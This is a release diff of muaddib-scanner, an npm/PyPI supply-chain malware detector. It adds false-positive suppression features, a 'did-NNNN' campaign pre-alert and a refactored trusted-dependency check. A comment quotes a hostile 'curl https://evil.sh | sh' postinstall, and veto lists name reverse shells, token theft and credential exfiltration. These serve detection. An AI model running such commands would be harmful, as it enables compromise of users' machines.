muaddib-scanner 2.11.23 → 2.11.28

package/README.md

@@ -275,7 +275,7 @@ With pre-commit framework:
 ```yaml
 repos:
   - repo: https://github.com/DNSZLSK/muad-dib
-    rev: v2.11.23
+    rev: v2.11.24
     hooks:
       - id: muaddib-scan
 ```
@@ -296,7 +296,7 @@ repos:
 | **FPR** (Benign random, v2.10.95 measure) | **7.0%** (14/200) | 200 random npm packages, stratified sampling |
 | **ADR** (Adversarial + Holdout) | **96.3%** (103/107) | 67 adversarial + 40 holdout (107 available on disk), global threshold=20 |
 
-**3594 tests** across 93 files. **234 rules** (229 RULES + 5 PARANOID).
+**3602 tests** across 93 files. **234 rules** (229 RULES + 5 PARANOID).
 
 > **ML retrain methodology (v2.10.51):**
 > - Ground truth: 377 confirmed_malicious via auto-labeler (OSSF malicious-packages, GitHub Advisory Database, npm registry takedown correlation)
@@ -344,7 +344,7 @@ npm test
 
 ### Testing
 
-- **3594 tests** across 93 modular test files
+- **3602 tests** across 93 modular test files
 - **56 fuzz tests** - Malformed inputs, ReDoS, unicode, binary
 - **Datadog 17K benchmark** - 14,587 confirmed malware samples (in-scope)
 - **Ground truth validation** - 67 real-world attacks (93.85% TPR@3, 86.2% TPR@20 — v2.10.95 measure)

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.23",
+  "version": "2.11.28",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/ml/feature-extractor.js

@@ -141,6 +141,15 @@ const GITHUB_RELEASE_HOSTS = ['github.com', 'objects.githubusercontent.com', 'ra
 const BUNDLE_PATH_RE = /(?:^|[\\/])(?:dist|build|lib|out|umd|esm|cjs|bundle|_next[\\/]static|\.next[\\/]static|public[\\/]static|webpack|rollup)[\\/]/i;
 const BUNDLE_FILE_RE = /\.(?:min|bundle|prod|umd|iife|esm|cjs)\.(?:m?js|cjs)$|\.min\.js$|chunk-[0-9a-f]+\.js$|vendors?~?.*\.js$/i;
 
+// v2.11.27 F12: reuse the exhaustive shared regex + veto helper from the
+// scanner side (covers @kitware/vtk.js, playwright/lib/utilsBundleImpl,
+// .yarn/releases, hash-suffixed chunks, Stencil sys/* dirs — patterns the
+// narrower local BUNDLE_PATH_RE misses).
+const {
+  BUNDLE_PATH_RE: SHARED_BUNDLE_PATH_RE,
+  hasBundleVetoSignal
+} = require('../shared/bundle-detect.js');
+
 // Threat types that indicate remote content fetch in a file (for
 // `git_hook_source_local` heuristic: absence => local source).
 const REMOTE_FETCH_TYPES = new Set([
@@ -792,6 +801,344 @@ function vendorCliSdk(result, meta) {
   return true;
 }
 
+// ============================================================================
+// Feature 11 — ai_agent_bot (v2.11.24, audit week3 cluster, 54 FP)
+// ============================================================================
+//
+// Targets the third cluster from the audit 2026-05-week3 (54 entries,
+// 18.9 % of FP): packages that ARE themselves multi-provider AI agents,
+// orchestrators, chatbots, or IM⇄AI bridges. Examples: gm-skill (AI coding
+// harness), codexmate (multi-provider orchestrator), lazyclaw (terminal
+// multi-LLM CLI), linco-connect (WeChat→Claude bridge), natureco-cli
+// (WhatsApp+Telegram bot), multis (Telegram chatbot), @aitne-sh/aitne
+// (personal AI daemon), @jhizzard/termdeck (browser term mux with AI),
+// triflux (Claude Code router), opuscode (Claude config wizard).
+//
+// These packages legitimately fire `dangerous_call_eval` (LLM tool-use
+// execute_code feature), `remote_code_load` (bun x pkg@latest fetching),
+// `detached_credential_exfil` (local session token storage), and lots
+// of `env_access` + `suspicious_dataflow`. F11 cannot blacklist these —
+// they ARE the core capabilities. Instead the conjunction requires:
+//
+//   - Positive AI agent identity (name/desc/keywords/deps signal)
+//   - Evidence the package operates on agent runtime data (touches paths
+//     like ~/.claude/, ~/.codex/, ~/.cursor/, etc.)
+//   - Absence of SANDWORM_MODE signatures: no preinstall, no
+//     mcp_config_injection (F9 priority), no third-party suspicious_domain,
+//     no credential file harvest, no binary dropper (F2 priority).
+//
+// Cap 35 (aligned with F10 — broader conjunction than F9).
+
+// Agent runtime directory regex — matches references in threat messages to
+// AI tool runtime paths. Both '~/.X/' and 'os.homedir() + "/.X"' patterns
+// surface as substrings here.
+const AGENT_RUNTIME_PATHS_RE = /[~/\\\\]\.(?:claude|codex|cursor|windsurf|continue|openclaude|openclaudia|hermes|aiflow|tdpilot|aitne|kimi|opuscode|freddie|gm-?log|gm-?skill|termdeck|relaydesk|natureco|grok|gemini|copilot|cline|aider|cody|tabnine|cursor-ai|cursorrules|claude-?desktop|claude-?code|llm[- ]?cache)\b/i;
+
+// AI agent name regex — package name signals identity.
+const AGENT_NAME_RE = /(?:^|[/_-])(?:agent|bot|chat|chatbot|claw|codex|coder|swarm|harness|brain|orchestr|orchestrator|claude|llm|hermes|aider|kimi|cline|cody|aitne|opuscode|relaydesk|termdeck|gm-skill|gm-hermes|gm-qwen|gm-thebird|gm-plugkit|relipa|triflux|protocol-proxy|codexmate|lazy?claw|natureco)(?:[_-]|$)/i;
+
+// Keywords that signal AI agent purpose (case-insensitive).
+const AGENT_KEYWORDS_SET = new Set([
+  'agent', 'ai', 'llm', 'chatbot', 'bot', 'claude', 'codex',
+  'cursor', 'copilot', 'ollama', 'openai', 'anthropic', 'gemini',
+  'multi-llm', 'multi-provider', 'orchestrator', 'coding-agent',
+  'ai-agent', 'llm-agent', 'mcp-agent'
+]);
+
+// Description regex — matches agent purpose phrases.
+const AGENT_DESC_RE = /\b(?:ai|llm|claude|codex|gemini|openai|anthropic|ollama)[ -]?(?:agent|bot|chatbot|orchestrator|harness|cli|assistant|coding[ -]?agent|gateway|relay|router|harness|workspace)\b|\bmulti[ -]?provider\b|\bcoding[ -]?agent\b|\bagent[ -]?(?:bridge|router|orchestrator)\b|telegram[ -]?(?:bot|bridge)|whatsapp[ -]?(?:bot|bridge)|wechat[ -]?(?:bot|bridge)/i;
+
+// Dependency names that signal AI agent / bot framework usage.
+const AGENT_DEPS = new Set([
+  '@anthropic-ai/sdk', '@anthropic-ai/claude-code', '@openai/agents', 'openai',
+  '@google/genai', '@google/generative-ai', 'ai', 'ollama', 'groq-sdk',
+  'telegraf', 'node-telegram-bot-api', '@whiskeysockets/baileys',
+  'whatsapp-web.js', 'discord.js', 'eventsource', 'node-pty',
+  '@anthropic-ai/bedrock-sdk', '@openai/realtime-api-beta'
+]);
+
+function _f11HasAgentIdentity(meta) {
+  if (!meta) return false;
+  const name = String(meta.name || '');
+  if (AGENT_NAME_RE.test(name)) return true;
+  const r = (meta.registryMeta || {});
+  const desc = r.description || meta.description || '';
+  if (AGENT_DESC_RE.test(desc)) return true;
+  if (Array.isArray(r.keywords)) {
+    for (const k of r.keywords) {
+      if (AGENT_KEYWORDS_SET.has(String(k).toLowerCase())) return true;
+    }
+  }
+  const deps = r.dependencies || meta.dependencies;
+  if (deps && typeof deps === 'object') {
+    for (const d of Object.keys(deps)) {
+      if (AGENT_DEPS.has(d)) return true;
+    }
+  }
+  return false;
+}
+
+function _f11HasAgentPathReference(threats) {
+  for (const t of threats) {
+    const msg = String(t.message || '');
+    if (AGENT_RUNTIME_PATHS_RE.test(msg)) return true;
+    // Also accept the threat's file field — sometimes the path leaks via the
+    // file location rather than the message body.
+    const file = String(t.file || '');
+    if (AGENT_RUNTIME_PATHS_RE.test(file)) return true;
+  }
+  return false;
+}
+
+/**
+ * Feature 11 — TRUE iff the package self-identifies as an AI agent / bot /
+ * multi-LLM orchestrator AND demonstrably operates on AI tool runtime
+ * data (~/.claude/, ~/.codex/, ~/.cursor/, etc.) AND lacks the
+ * SANDWORM_MODE / vendor-impersonation signatures.
+ *
+ * Conjunction of 7 conditions:
+ *
+ *   C1  AI agent identity (name|desc|keywords|deps signal)
+ *   C2  no install lifecycle hook
+ *   C3  no `mcp_config_injection` (F9 priority)
+ *   C4  no `suspicious_domain` threat (third-party exfil discriminator)
+ *   C5  no credential file path in any threat message (reuse F9 regex)
+ *   C6  >=1 threat references an agent runtime path (positive operating signal)
+ *   C7  no `binary_dropper` / `download_exec_binary` (F2 priority)
+ *
+ * Cap 35. Same cap as F10 (broader conjunction than F9). Reuses
+ * `F9_CREDENTIAL_FILE_RE` from v2.11.22.
+ *
+ * Discriminator vs malware:
+ *   - SANDWORM droppers use preinstall/postinstall (C2 blocks).
+ *   - MCP-impersonating malware emits mcp_config_injection (C3 → F9).
+ *   - Exfilers have suspicious_domain (C4 blocks).
+ *   - Binary droppers (C7 → F2 territory).
+ *   - Credential file harvesters (C5 blocks).
+ *
+ * Covers up to 54 FP (18.9% of audit week3). Effective estimated coverage
+ * 30-40 (55-75%): the rest lack agent runtime path references or fire on
+ * suspicious_domain due to Chinese model rerouting (yingclaw pattern).
+ */
+function aiAgentBot(result, meta) {
+  // C1 — identity
+  if (!_f11HasAgentIdentity(meta)) return false;
+  const threats = (result && result.threats) || [];
+  if (threats.length === 0) return false;
+  // C2 — no install lifecycle hook
+  if (hasLifecycleScripts(meta)) return false;
+  // C3, C4, C7 — fast threat-type checks
+  for (const t of threats) {
+    if (t.type === 'mcp_config_injection') return false;   // C3
+    if (t.type === 'suspicious_domain') return false;      // C4
+    if (t.type === 'binary_dropper') return false;         // C7
+    if (t.type === 'download_exec_binary') return false;   // C7
+  }
+  // C5 — no credential file path in any message
+  for (const t of threats) {
+    if (F9_CREDENTIAL_FILE_RE.test(String(t.message || ''))) return false;
+  }
+  // C6 — at least one threat references an agent runtime path
+  if (!_f11HasAgentPathReference(threats)) return false;
+  return true;
+}
+
+// ============================================================================
+// Feature 12 — vendor_minified_bundle (v2.11.27, weekly review 2026-05-22, 9 FP)
+// ============================================================================
+//
+// Targets the @photoroom/ui (1.8MB UMD bundle, 6 cascade types) and
+// @vkontakte/videoplayer-shared (32KB min, 4 cascade types) cluster: vendor
+// React/JS bundles where webpack/rollup/esbuild output legitimately produces
+// `eval`, `new Function`, prototype mutations for framework reactivity,
+// `Proxy({set/get})` interceptors, credential-regex-looking strings, and
+// minified blobs that trip the obfuscation heuristic. Per-file co-occurrence
+// of >=3 of those patterns on a path matching BUNDLE_PATH_RE is the signal.
+//
+// Complements F1 (bundleWithoutInstallScripts, cap 30) which requires ALL
+// threat files to exceed 100KB and ALL threats to carry t.file — both
+// conditions are too strict for the v2.11.27 cluster (vkontakte is 32KB; the
+// cluster co-occurs with package-level `intent_credential_exfil` for some
+// packages). F12 uses a 20KB floor per cascade file and an explicit C3
+// veto on package-level exfil intents instead of disqualifying outright.
+
+const CASCADE_TYPES = new Set([
+  'credential_regex_harvest',     // MUADDIB-AST-041
+  'dangerous_call_eval',          // MUADDIB-AST-004
+  'dangerous_call_function',      // MUADDIB-AST-005
+  'prototype_pollution',          // MUADDIB-AST-065
+  'proxy_data_intercept',         // MUADDIB-AST-043
+  'remote_code_load',             // MUADDIB-AST-040
+  'obfuscation_detected',         // src/scanner/obfuscation.js
+  'js_obfuscation_pattern'
+]);
+const CASCADE_MIN_TYPES = 3;
+const CASCADE_MIN_FILE_BYTES = 20 * 1024;
+
+/**
+ * Feature 12 — TRUE iff the package ships at least one minified vendor
+ * bundle file with >=3 distinct CASCADE_TYPES firing on it AND has no
+ * install lifecycle script AND no veto signal AND no package-level exfil
+ * intent.
+ *
+ * Discriminator vs malware injected into a bundle:
+ *   - hasBundleVetoSignal (src/shared/bundle-detect.js) catches reverse_shell,
+ *     node_modules_write, npm_publish_worm, npm_token_steal, systemd_persistence,
+ *     unicode_invisible_injection (GlassWorm), ioc_match,
+ *     known_malicious_package, shai_hulud_marker, detached_credential_exfil,
+ *     ai_config_injection, ide_task_persistence, plus env_access on
+ *     SENSITIVE_ENV_RE (NPM_TOKEN, AWS_*, SSH_*, etc.).
+ *   - C3 catches Axios UNC1069-style package-level intent_credential_exfil /
+ *     intent_command_exfil (no `t.file` → not file-scoped → real campaign).
+ *   - C2 (no lifecycle) catches postinstall droppers.
+ *   - C7 (20KB floor) catches hand-written 4KB eval injections in dist/.
+ *
+ * Cap 25 (MEDIUM). Tighter than F1=30: the cascade of >=3 bundler-emitted
+ * heuristics on a single file is a stronger structural bundler signature
+ * than "any large file with no install hook".
+ */
+function vendorMinifiedBundle(result, meta) {
+  if (!meta || !meta.registryMeta || meta.registryMeta.scripts === undefined) return false;
+  if (hasLifecycleScripts(meta)) return false;
+
+  const threats = (result && result.threats) || [];
+  if (threats.length === 0) return false;
+
+  // C3 — package-level exfil intent disqualifies (real campaign signal,
+  // not bundler artifact: bundlers never produce intent threats without
+  // a backing file).
+  for (const t of threats) {
+    if ((t.type === 'intent_credential_exfil' || t.type === 'intent_command_exfil') && !t.file) {
+      return false;
+    }
+  }
+
+  const summary = (result && result.summary) || {};
+  const fileSizes = summary.fileSizes || {};
+  const typesByFile = new Map();
+
+  for (const t of threats) {
+    if (!t.file || !CASCADE_TYPES.has(t.type)) continue;
+    if (!SHARED_BUNDLE_PATH_RE.test(t.file) && !BUNDLE_FILE_RE.test(t.file)) continue;
+    if (!typesByFile.has(t.file)) typesByFile.set(t.file, new Set());
+    typesByFile.get(t.file).add(t.type);
+  }
+
+  for (const [file, types] of typesByFile) {
+    if (types.size < CASCADE_MIN_TYPES) continue;
+    if (hasBundleVetoSignal(threats, file)) continue;
+    const size = fileSizes[file];
+    if (typeof size === 'number' && size < CASCADE_MIN_FILE_BYTES) continue;
+    return true;
+  }
+  return false;
+}
+
+// ============================================================================
+// Feature 13 — typosquat_benign_lifecycle (v2.11.28, weekly review 2026-05-22, 9 FP)
+// ============================================================================
+//
+// Targets the dependency_typosquat boundary-squat cluster (Axios UNC1069 rule
+// RT-C1 fired in March 2026 + RT-C1-FPR audit 2026-05). The boundary-squat
+// scanner emits `dependency_typosquat` MEDIUM on any sub-dep matching
+// `<prefix>-<popular>` or `<popular>-<suffix>` when the extra token is not in
+// LEGIT_BOUNDARY_TOKENS. The compound `typosquat_lifecycle` (CRITICAL,
+// src/scoring.js:517-523) escalates it to CRITICAL whenever a lifecycle hook
+// is present — including provably benign ones like `husky install`,
+// `npm run build`, or `node patches/apply-patches.js` (balena-cli pattern).
+//
+// F13 suppresses that compound's contribution when all lifecycle scripts are
+// provably benign AND no real exfil / IOC / `dependency_typosquat_used`
+// signal is present. The Axios UNC1069 discriminator (require()d sub-dep)
+// emits dependency_typosquat_used + the dependency_typosquat_require
+// compound — both vetoed in F13_VETO_TYPES.
+//
+// Reuses `isSafeLifecycleScript` from src/monitor/temporal.js:53 (covers
+// `npm run build`, `tsc`, `eslint`, etc.) and extends it with audit-observed
+// patterns: husky install, simple-git-hooks, patch-package,
+// `node patches/apply-patches.js`, is-ci || X guard.
+
+const { isSafeLifecycleScript } = require('../monitor/temporal.js');
+
+const F13_BENIGN_SCRIPT_RE = /^(?:is-ci\s*\|\|\s*)?(?:husky(?:\s+install)?|simple-git-hooks|patch-package|node\s+patches\/apply-patches\.js|npm\s+run\s+build(?::[a-z0-9_-]+)?)\s*$/i;
+
+function isBenignLifecycleScript(value) {
+  if (!value || typeof value !== 'string') return false;
+  if (isSafeLifecycleScript(value)) return true;
+  return value.trim().split(/\s*&&\s*/).every(cmd => F13_BENIGN_SCRIPT_RE.test(cmd.trim()));
+}
+
+const F13_VETO_TYPES = new Set([
+  // Egress / exfil — any real network capability is a campaign signal
+  'suspicious_dataflow', 'suspicious_domain', 'remote_code_load', 'curl_exec',
+  'intent_credential_exfil', 'intent_command_exfil', 'fetch_decrypt_exec',
+  'reverse_shell', 'binary_dropper', 'download_exec_binary',
+  'curl_env_exfil', 'external_tarball_dep', 'dependency_url_suspicious',
+  'blockchain_c2_resolution', 'dns_exfil',
+  // Worm propagation (Shai-Hulud)
+  'npm_publish_worm', 'node_modules_write', 'npm_token_steal',
+  // IOC hits
+  'ioc_match', 'known_malicious_package', 'shai_hulud_marker', 'ioc_string_match',
+  // DPRK / mini Shai-Hulud 2026-05
+  'detached_credential_exfil', 'ai_config_injection', 'ide_task_persistence',
+  // Axios UNC1069 discriminator: dep is require()d in code
+  'dependency_typosquat_used', 'dependency_typosquat_require'
+]);
+
+const F13_LIFECYCLE_KEYS = ['preinstall', 'install', 'postinstall', 'prepare'];
+
+/**
+ * Feature 13 — TRUE iff the package shows the compound `typosquat_lifecycle`
+ * (boundary-squat dep + lifecycle hook) AND every declared lifecycle script
+ * is provably benign AND no exfil / IOC / dep-usage signal is present.
+ *
+ * Discriminator vs malware:
+ *   - Axios UNC1069 wrappers emit `dependency_typosquat_used` (the dep is
+ *     require()d in source) + compound `dependency_typosquat_require` → veto.
+ *   - Shai-Hulud worm emits `npm_publish_worm`, `node_modules_write`,
+ *     `npm_token_steal` → veto.
+ *   - GlassWorm / DPRK emit `unicode_invisible_injection` (downstream
+ *     irrelevant — caught at scanner severity)/ `detached_credential_exfil`
+ *     / `ai_config_injection` / `ide_task_persistence` → veto.
+ *   - Real install-time droppers carry suspicious_dataflow / suspicious_domain
+ *     / remote_code_load / curl_exec / intent_*_exfil → veto.
+ *   - Hand-crafted `curl https://evil.sh | sh` postinstall fails
+ *     isBenignLifecycleScript → veto.
+ *
+ * Targets the v2.11.28 weekly review 2026-05-22 cluster:
+ *   - @doyourjob/gravity-ui-page-constructor (prepare: husky install)
+ *   - balena-cli (postinstall: node patches/apply-patches.js)
+ *   - magmastream (prepare: npm run build)
+ *   - @1d1s/design-system (prepare: npm run build:lib)
+ *   - @healthcare-interoperability/fhir-storage-core (prepare: npm run build)
+ *   - @quicore/problem-details-error (prepare: npm run build)
+ *
+ * Cap 30 (MEDIUM). Matches the F9 (mcp_server_env_access) cap because both
+ * suppress a compound-driven CRITICAL into the residual MEDIUM signal.
+ */
+function typosquatBenignLifecycle(result, meta) {
+  const threats = (result && result.threats) || [];
+  if (!threats.some(t => t.type === 'dependency_typosquat' || t.type === 'typosquat_detected')) return false;
+  if (!threats.some(t => t.type === 'lifecycle_script')) return false;
+  if (!threats.some(t => t.type === 'typosquat_lifecycle')) return false;
+
+  for (const t of threats) {
+    if (F13_VETO_TYPES.has(t.type)) return false;
+  }
+
+  const scripts = (meta && meta.registryMeta && meta.registryMeta.scripts) || null;
+  if (!scripts || typeof scripts !== 'object') return false;
+
+  let sawScript = false;
+  for (const key of F13_LIFECYCLE_KEYS) {
+    const v = scripts[key];
+    if (typeof v !== 'string' || v.trim().length === 0) continue;
+    sawScript = true;
+    if (!isBenignLifecycleScript(v)) return false;
+  }
+  return sawScript;
+}
+
 /**
  * Feature 8 — TRUE iff the package declares at least one install
  * lifecycle script AND the scan shows no network egress capability
@@ -946,6 +1293,8 @@ function extractFeatures(result, meta) {
   features.mcp_server_env_access = mcpServerEnvAccess(result, meta) ? 1 : 0;
   // --- v2.11.23 Feature 10 (audit week3 cluster — up to 96 FP) ---
   features.vendor_cli_sdk = vendorCliSdk(result, meta) ? 1 : 0;
+  // --- v2.11.24 Feature 11 (audit week3 cluster — up to 54 FP) ---
+  features.ai_agent_bot = aiAgentBot(result, meta) ? 1 : 0;
 
   return features;
 }
@@ -1026,5 +1375,9 @@ module.exports = {
   placeholderAntiDepConfusion,
   installScriptNoNetworkEgress,
   mcpServerEnvAccess,
-  vendorCliSdk
+  vendorCliSdk,
+  aiAgentBot,
+  vendorMinifiedBundle,
+  typosquatBenignLifecycle,
+  isBenignLifecycleScript
 };

package/src/monitor/ingestion.js

@@ -14,7 +14,23 @@ const {
   loadNpmSeq, saveNpmSeq, CHANGES_STREAM_URL, CHANGES_LIMIT, CHANGES_CATCHUP_MAX,
   savePypiSerial, PYPI_XMLRPC_URL, PYPI_CATCHUP_MAX
 } = require('./state.js');
-const { sendIOCPreAlert } = require('./webhook.js');
+const { sendIOCPreAlert, sendCampaignPreAlert } = require('./webhook.js');
+
+// Active-campaign name patterns. Pre-alert fires on match BEFORE tarball
+// download so operators have visibility while IOC lists catch up (typical
+// lag: hours to days).
+// did-NNNN (May 2026): wave of did-0001..did-9999 publications observed in
+// the changes stream — name shape alone is enough to flag for fast triage.
+const CAMPAIGN_PATTERNS = [
+  { name: 'did-NNNN', re: /^did-\d{4}$/ }
+];
+
+function matchCampaignPattern(name) {
+  for (const c of CAMPAIGN_PATTERNS) {
+    if (c.re.test(name)) return c.name;
+  }
+  return null;
+}
 const { evaluateCacheTrigger, POPULAR_THRESHOLD, downloadsCache, DOWNLOADS_CACHE_TTL } = require('./classify.js');
 
 const SELF_PACKAGE_NAME = require('../../package.json').name;
@@ -133,105 +149,6 @@ async function getWeeklyDownloads(packageName) {
   }
 }
 
-// --- Trusted dependency diff check ---
-
-const TRUSTED_DEP_AGE_THRESHOLD_MS = 7 * 24 * 60 * 60 * 1000; // 7 days
-
-/**
- * Check for new dependencies added to a TRUSTED (popular) package.
- * Detects supply-chain attacks where a compromised maintainer account adds a
- * malicious dependency in a patch bump (e.g., axios 1.14.0 → 1.14.1 adding
- * plain-crypto-js, 2026-03-30).
- *
- * @param {string} name - Package name
- * @param {string} newVersion - Newly published version
- * @returns {Array} Array of findings (empty if no new deps or on error)
- */
-async function checkTrustedDepDiff(name, newVersion) {
-  const findings = [];
-  try {
-    // Fetch packument to get version list and dependencies
-    const body = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(name)}`, 10_000);
-    const packument = JSON.parse(body);
-
-    if (!packument.versions || !packument.time) return findings;
-
-    // Sort versions by publish time (not semver — handles prereleases correctly)
-    const timeMap = packument.time;
-    const versionKeys = Object.keys(packument.versions)
-      .filter(v => timeMap[v])
-      .sort((a, b) => new Date(timeMap[a]) - new Date(timeMap[b]));
-
-    const newIdx = versionKeys.indexOf(newVersion);
-    if (newIdx <= 0) return findings; // First version or not found
-
-    const prevVersion = versionKeys[newIdx - 1];
-
-    const prevDeps = (packument.versions[prevVersion] && packument.versions[prevVersion].dependencies) || {};
-    const newDeps = (packument.versions[newVersion] && packument.versions[newVersion].dependencies) || {};
-
-    // Find newly added dependencies (name not present in previous version)
-    const addedDeps = Object.keys(newDeps).filter(dep => !(dep in prevDeps));
-    if (addedDeps.length === 0) return findings;
-
-    console.log(`[MONITOR] TRUSTED dep diff: ${name} ${prevVersion} → ${newVersion}: +${addedDeps.length} new dep(s): ${addedDeps.join(', ')}`);
-
-    for (const dep of addedDeps) {
-      let ageMs = null;
-      try {
-        const depBody = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(dep)}`, 5_000);
-        const depData = JSON.parse(depBody);
-        const created = depData.time && depData.time.created;
-        if (created) {
-          ageMs = Date.now() - new Date(created).getTime();
-        }
-      } catch (err) {
-        console.log(`[MONITOR] WARNING: could not check age of dependency ${dep}: ${err.message}`);
-      }
-
-      if (ageMs === null || ageMs < TRUSTED_DEP_AGE_THRESHOLD_MS) {
-        // Unknown or < 7 days old — CRITICAL
-        const ageDays = ageMs !== null ? Math.floor(ageMs / 86400000) : 'unknown';
-        findings.push({
-          type: 'trusted_new_unknown_dependency',
-          severity: 'CRITICAL',
-          confidence: ageMs === null ? 'medium' : 'high',
-          file: 'package.json',
-          message: `TRUSTED package ${name} added unknown dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
-          rule_id: 'MUADDIB-TRUSTED-001',
-          mitre: 'T1195.002',
-          dep,
-          depAgeDays: ageDays,
-          prevVersion,
-          newVersion
-        });
-      } else {
-        // Known dependency (>= 7 days old) — HIGH
-        const ageDays = Math.floor(ageMs / 86400000);
-        findings.push({
-          type: 'trusted_new_dependency',
-          severity: 'HIGH',
-          confidence: 'medium',
-          file: 'package.json',
-          message: `TRUSTED package ${name} added new dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
-          rule_id: 'MUADDIB-TRUSTED-002',
-          mitre: 'T1195.002',
-          dep,
-          depAgeDays: ageDays,
-          prevVersion,
-          newVersion
-        });
-      }
-    }
-
-    return findings;
-  } catch (err) {
-    // Graceful fallback — log warning, continue as TRUSTED
-    console.log(`[MONITOR] WARNING: trusted dep diff check failed for ${name}@${newVersion}: ${err.message}`);
-    return findings;
-  }
-}
-
 // --- Tarball URL helpers ---
 
 function getNpmTarballUrl(pkgData) {
@@ -595,6 +512,20 @@ async function pollNpmChanges(state, scanQueue, stats) {
         console.warn(`[MONITOR] IOC pre-check failed: ${err.message}`);
       }
 
+      // Layer 1b: Campaign pre-alert — fire on name-pattern matches when the
+      // package isn't already a known IOC (avoid duplicate webhooks for the
+      // same publication). Lets us flag campaign waves while IOC lists lag.
+      if (!isKnownIOC) {
+        const campaign = matchCampaignPattern(name);
+        if (campaign) {
+          console.log(`[MONITOR] CAMPAIGN PRE-ALERT: ${name} — matches ${campaign}`);
+          stats.campaignPreAlerts = (stats.campaignPreAlerts || 0) + 1;
+          sendCampaignPreAlert(name, campaign).catch(err => {
+            console.error(`[MONITOR] campaign pre-alert webhook failed for ${name}: ${err.message}`);
+          });
+        }
+      }
+
       // Layer 2: Extract tarball URL from CouchDB doc (eliminates lazy resolution 404 race)
       const docMeta = change.doc ? extractTarballFromDoc(change.doc) : null;
 
@@ -690,9 +621,10 @@ async function pollNpmRss(state, scanQueue, stats) {
 
       // Layer 1: IOC pre-alert (RSS fallback path)
       // Only wildcard IOCs trigger here; versioned IOCs checked in resolveTarballAndScan().
+      let isKnownIOC = false;
       try {
         const iocs = loadCachedIOCs();
-        const isKnownIOC = iocs.wildcardPackages && iocs.wildcardPackages.has(name);
+        isKnownIOC = iocs.wildcardPackages && iocs.wildcardPackages.has(name);
         if (isKnownIOC) {
           console.log(`[MONITOR] IOC PRE-ALERT: ${name} — known malicious package detected via RSS`);
           stats.iocPreAlerts = (stats.iocPreAlerts || 0) + 1;
@@ -702,6 +634,18 @@ async function pollNpmRss(state, scanQueue, stats) {
         }
       } catch { /* IOC load failure is non-fatal */ }
 
+      // Layer 1b: Campaign pre-alert (RSS fallback path) — mirrors pollNpmChanges.
+      if (!isKnownIOC) {
+        const campaign = matchCampaignPattern(name);
+        if (campaign) {
+          console.log(`[MONITOR] CAMPAIGN PRE-ALERT: ${name} — matches ${campaign} (RSS)`);
+          stats.campaignPreAlerts = (stats.campaignPreAlerts || 0) + 1;
+          sendCampaignPreAlert(name, campaign).catch(err => {
+            console.error(`[MONITOR] campaign pre-alert webhook failed for ${name}: ${err.message}`);
+          });
+        }
+      }
+
       // Queue npm packages — tarball URL resolved during scan
       scanQueue.push({
         name,
@@ -1150,8 +1094,6 @@ module.exports = {
   httpsGet,
   httpsPost,
   getWeeklyDownloads,
-  checkTrustedDepDiff,
-  TRUSTED_DEP_AGE_THRESHOLD_MS,
 
   // Tarball URL helpers
   getNpmTarballUrl,
@@ -1183,6 +1125,10 @@ module.exports = {
   pollPyPI,
   poll,
 
+  // Active-campaign name watch (did-NNNN, etc.)
+  CAMPAIGN_PATTERNS,
+  matchCampaignPattern,
+
   // Test seam — see _deps definition near the top of this file.
   _deps
 };

package/src/monitor/queue.js

@@ -56,8 +56,6 @@ const {
   formatFindings,
   evaluateCacheTrigger,
   isFirstPublishHighRisk,
-  POPULAR_THRESHOLD,
-  downloadsCache: classifyDownloadsCache,
   DOWNLOADS_CACHE_TTL,
   HIGH_CONFIDENCE_MALICE_TYPES,
   IOC_MATCH_TYPES,
@@ -98,8 +96,8 @@ const {
   isSafeLifecycleScript
 } = require('./temporal.js');
 
-// From ./ingestion.js (will be created — currently in monitor.js)
-const { getNpmLatestTarball, getPyPITarballUrl, getWeeklyDownloads, checkTrustedDepDiff } = require('./ingestion.js');
+// From ./ingestion.js
+const { getNpmLatestTarball, getPyPITarballUrl } = require('./ingestion.js');
 
 // From ./tarball-archive.js
 const { archiveSuspectTarball } = require('./tarball-archive.js');
@@ -226,12 +224,15 @@ function countPackageFiles(dir) {
  *
  * @param {string} extractedDir - Path to extracted package
  * @param {number} timeoutMs - Timeout in milliseconds
+ * @param {object} [scanContext] - Monitor-side context spread into pipeline options.
+ *   Required by opt-in scanners (e.g. trusted-dep-diff) that need name/version/ecosystem
+ *   and a monitorMode flag to perform registry queries.
  * @returns {Promise<object>} Scan result (same shape as run(_, {_capture:true}))
  */
-function runScanInWorker(extractedDir, timeoutMs) {
+function runScanInWorker(extractedDir, timeoutMs, scanContext = null) {
   return new Promise((resolve, reject) => {
     const worker = new Worker(SCAN_WORKER_PATH, {
-      workerData: { extractedDir }
+      workerData: { extractedDir, scanContext: scanContext || {} }
     });
 
     let settled = false;
@@ -418,7 +419,19 @@ async function scanPackage(name, version, ecosystem, tarballUrl, registryMeta, s
 
     let result;
     try {
-      result = await runScanInWorker(extractedDir, STATIC_SCAN_TIMEOUT_MS);
+      // scanContext: feeds monitor-side info (name/version/ecosystem) and the
+      // monitorMode + trustedDepDiff flags into opt-in pipeline scanners.
+      // The trusted-dep-diff scanner needs both name and version to query the
+      // registry for the previous-version dependency list — that information
+      // is meaningless in offline CLI mode but available here.
+      const scanContext = {
+        name,
+        version,
+        ecosystem,
+        monitorMode: true,
+        trustedDepDiff: true
+      };
+      result = await runScanInWorker(extractedDir, STATIC_SCAN_TIMEOUT_MS, scanContext);
     } catch (staticErr) {
       if (/static scan timeout/i.test(staticErr.message)) {
         console.error(`[MONITOR] STATIC_TIMEOUT: ${name}@${version} — exceeded ${STATIC_SCAN_TIMEOUT_MS / 1000}s (worker terminated)`);
@@ -542,40 +555,20 @@ async function scanPackage(name, version, ecosystem, tarballUrl, registryMeta, s
         recordTrainingSample(result, { name, version, ecosystem, label: 'clean', registryMeta: meta, unpackedSize: meta.unpackedSize, npmRegistryMeta, fileCountTotal, hasTests });
         return { sandboxResult: null, staticClean: true };
       } else {
-        // Popularity pre-filter: skip sandbox for popular npm packages with only MEDIUM/LOW
-        if (ecosystem === 'npm' && !hasIOCMatch(result) && !hasTyposquat(result) && !hasHighOrCritical(result)) {
-          const downloads = await getWeeklyDownloads(name);
-          if (downloads >= POPULAR_THRESHOLD) {
